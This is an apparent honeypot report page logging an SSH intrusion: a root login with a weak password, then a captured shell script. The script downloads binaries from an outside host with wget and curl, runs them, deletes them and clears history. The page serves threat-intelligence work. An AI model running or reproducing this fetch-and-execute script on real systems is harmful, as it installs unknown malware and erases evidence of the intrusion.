Report of Attack 218.92.0.60 (60.0.92.218.in-addr.arpa) ssh observation

Header

Time	2024/03/26, 16:13:40 (GMT)
Transaction ID	553C5HBLM8GM7DRE
Service	ssh
Location	CN (China)
Attacker	218.92.0.60
Classification	Command execution
Harm Potential	Medium

Description

System command execution attempt

Content

218.92.0.60 client username 'root' and password '12345678' entered
218.92.0.60 client command : '#!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://43.249.172.195:888/112
curl -O http://43.249.172.195:888/112
chmod +x 112
./112
wget http://43.249.172.195:888/112s
curl -O http://43.249.172.195:888/112s
chmod +x 112s
./112s
rm -rf 112.sh
rm -rf 112
rm -rf 112s
history -c'

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin

If you like, you can support
with your donations to us..

Donate

Attack Report for Observation

Header

Time

2024/03/26, 16:13:40 (GMT)

Transaction ID

553C5HBLM8GM7DRE

Service

ssh

Location

CN (China)

Attacker

218.92.0.60

Classification

Command execution

Harm Potential

Medium

Description

System command execution attempt

Content